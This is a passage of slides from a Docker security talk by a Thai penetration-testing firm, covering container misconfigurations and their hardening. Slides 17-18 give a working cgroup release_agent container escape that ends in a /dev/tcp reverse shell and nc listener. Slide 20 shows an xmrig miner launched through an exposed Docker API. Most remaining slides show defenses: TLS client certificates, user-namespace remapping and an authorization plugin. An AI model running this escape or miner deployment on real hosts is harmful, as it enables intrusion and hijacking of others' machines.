    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 4: Mount Sensitive Volumes #2 dev01@parrot:~$ docker run --rm -it -v /var/run/docker.sock:/var/run/docker.sock -v /usr/bin/docker:/usr/bin/docker ubuntu bash root@18ea7c42f8f2:/# docker run -it --privileged -v /usr/bin/nc:/usr/bin/nc ubuntu bash root@9121d1d3663f:/# mkdir /tmp/cgrp root@9121d1d3663f:/# mount -t cgroup -o rdma cgroup /tmp/cgrp root@9121d1d3663f:/# mkdir /tmp/cgrp/x root@9121d1d3663f:/# echo 1 > /tmp/cgrp/x/notify_on_release root@9121d1d3663f:/# host_path=`sed -n 's/.*perdir=([^,]*).*/1/p' /etc/mtab` root@9121d1d3663f:/# echo "$host_path/shell.sh" > /tmp/cgrp/release_agent 17
  • 18.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 4: Mount Sensitive Volumes #2 root@9121d1d3663f:/# echo '#!/bin/sh' > /shell.sh root@9121d1d3663f:/# echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/172.17.0.2/9999 0>&1"' >> /shell.sh root@9121d1d3663f:/# chmod a+x /shell.sh root@9121d1d3663f:/# sleep 2 && sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" & root@9121d1d3663f:/# nc -lvp 9999 listening on [any] 9999 ... root@parrot:/# 18
  • 19.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 5: Docker Remote API Exposure Enable the remote API for dockerd $ cat /lib/systemd/system/docker.service [...] ExecStart=/usr/bin/dockerd -H tcp://0.0.0.0:2375 -H fd:// --containerd=/run/containerd/containerd.sock [...] $ systemctl daemon-reload $ service docker restart 19
  • 20.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 5: Docker Remote API Exposure $ docker -H 192.168.1.2:2375 run xmrig/xmrig -o xmr.crypto-pool.fr:443 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URn RoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD -p x --donate-level=1 20 Image source: https://cyware.com/news/monero-site-hack-how-hackers-distributed-cryptocurrency-stealing-malware-e3366e2b
  • 21.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 5: Docker Remote API Exposure Image source: https://www.alibabacloud.com/blog/xulu-cryptojacking-leveraging-shodan-tor-and-malicious-docker-container_594869 21
  • 22.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 5: Docker Remote API Exposure 22
  • 23.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Misconfig 5: Docker Remote API Exposure Authentication with TLS Client Certificate $ docker --tlsverify --tlscacert=ca.pem --tlscert=cert.pem --tlskey=key.pem -H=$HOST:2376 version 23Image source: https://dker.ru/docs/component-projects/docker-swarm/overview-docker-swarm-with-tls/
  • 24.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Low-Privileged Container (host’s root !== container’s root) 24
  • 25.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Low-Privileged Container 25Image source: https://medium.com/@tonistiigi/experimenting-with-rootless-docker-416c9ad8c0d6
  • 26.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Low-Privileged Container 26Image source: https://medium.com/@tonistiigi/experimenting-with-rootless-docker-416c9ad8c0d6
  • 27.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Enable User Namespaces $ useradd -u 200000 temp-ns-root $ groupmod -g 200000 temp-ns-root $ useradd temp-ns $ cat /etc/passwd | grep temp temp-ns-root:x:200000:200000::/home/temp-ns-root:/bin/sh temp-ns:x:1001:1001::/home/temp-ns:/bin/sh Linux User Namespace 27 https://docs.docker.com/engine/security/userns-remap/
  • 28.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Enable User Namespaces $ cat /etc/subuid temp-ns:200000:65536 $ cat /etc/subgid temp-ns:200000:65536 Linux User Namespace 28
  • 29.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Enable User Namespaces $ cat /etc/docker/daemon.json { "userns-remap": "temp-ns:temp-ns" } $ systemctl daemon-reload $ systemctl restart docker $ docker info [...] Security Options: userns Linux User Namespace 29
  • 30.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ docker run -it -v /:/mnt/host --rm alpine sh / # cat /proc/self/uid_map 0 200000 65536 / # cat /proc/self/gid_map 0 200000 65536 / # cat /mnt/host/etc/shadow cat: can't open '/mnt/host/etc/shadow': Permission denied / # touch /mnt/host/tmp/remapped / # exit $ ls -la /tmp/remapped -rw-r--r-- 1 temp-ns-root temp-ns-root 0 Jan 23 08:42 /tmp/remapped Linux User Namespace 30
  • 31.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined -v /usr/bin/nc:/usr/bin/nc ubuntu bash root@d34335b93113:/# mkdir /tmp/cgrp root@d34335b93113:/# mount -t cgroup -o rdma cgroup /tmp/cgrp mount: /tmp/cgrp: permission denied. Linux User Namespace 31
  • 32.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ docker run -it --userns=host -v /:/mnt/host --rm alpine sh / # touch /mnt/host/tmp/remapped / # exit $ ls -la /tmp/remapped -rw-r--r-- 1 root root 0 Jan 23 08:53 /tmp/remapped Linux User Namespace 32
  • 33.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Linux User Namespace 33 https://github.com/moby/moby/issues/22223
  • 34.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Linux User Namespace 34 https://github.com/moby/moby/issues/22223
  • 35.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public In short, an OS process/service that extends capabilities of Docker Engine. 1. Authorization - Extend API authorization mechanism 2. Network - Extend network management - VXLAN, IPVLAN, MACVLAN, ... 3. Volume - Extend persistent storage - Amazon EBS, ... 4. IPAM - Extend IP address management - DNS, DHCP, ... 5. Graph - Extend image and container fs storage Docker Plugin - What is it? 35
  • 36.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Register Docker plugin by putting itself in a plugin directory: 1. Unix Domain Socket - /run/docker/plugins/demo.sock 2. URL - /etc/docker/plugins/demo.spec - unix:///other.sock - tcp://localhost:8080 3. JSON Specification - /etc/docker/plugins/demo.json Docker Plugin API 36
  • 37.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Docker Plugin - Volume plugin for Amazon EBS https://docs.docker.com/engine/extend/EBS_volume/ 37
  • 38.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Docker Authorization Model (1 - Default) 38
  • 39.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Docker Authorization Model (2 - with AuthZ Plugin) 39 Image source: https://docs.docker.com/engine/extend/pluginsut_ahorization/
  • 40.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Example with docker-no-trivial-root Plugin 40 https://github.com/ad-freiburg/docker-no-trivial-root Disabling some trivial ways of gaining root via Docker
  • 41.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Just A Quick Look At The Code 41https://github.com/ad-freiburg/docker-no-trivial-root
  • 42.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public Just A Quick Look At The Code 42https://github.com/ad-freiburg/docker-no-trivial-root
  • 43.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ ./docker-no-trivial-root & [1] 11552 $ ls -al /run/docker/plugins/ total 0 drwx------ 2 root root 60 Jan 24 05:13 . drwx------ 8 root root 180 Jan 23 09:58 .. srw-rw---- 1 root root 0 Jan 24 05:13 no-trivial-root.sock Docker Authorization Plugin 43
  • 44.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public $ cat /etc/docker/daemon.json { "authorization-plugins": ["no-trivial-root"] } $ systemctl daemon-reload $ systemctl restart docker Docker Authorization Plugin 44 $ docker info [...] Plugins: Volume: local Network: bridge host ipvlan macvlan null overlay Authorization: no-trivial-root
  • 45.
    บจก.สยามถนัดแฮก Responsible / Version:Mr. Peeranat Thantaletong / 1.0 (2020-01-25) Confidentiality class: Public 45 Any Question ? Contact us: pentest@sth.sh